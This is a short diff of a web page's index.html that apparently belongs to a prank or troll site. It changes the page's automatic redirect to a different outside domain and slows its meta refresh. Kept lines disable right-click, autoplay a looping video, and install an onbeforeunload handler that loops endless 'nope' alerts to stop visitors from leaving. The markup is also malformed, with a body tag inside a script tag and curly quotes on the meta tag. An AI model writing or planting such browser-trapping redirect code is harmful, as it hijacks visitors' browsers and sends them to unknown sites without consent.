--- a/index.html
+++ b/index.html
@@ -399,11 +399,11 @@
 		}
 		</style>
 	<script>
-	<body oncontextmenu="return false" onload="location.href='https://www.darknesscommunity.club/', load();">
+	<body oncontextmenu="return false" onload="location.href='https://www.alexfunes.tk/', load();">
 		<video autoplay="" loop=""> 
 			<source src="polishcow.mp4" type='video/mp4'>
 		</video>
-		<meta http-equiv=”refresh” content="1" />
+		<meta http-equiv=”refresh” content="5" />
 		<script>window.onbeforeunload = function(){
   		while (true) { alert("nope"); };
 	};
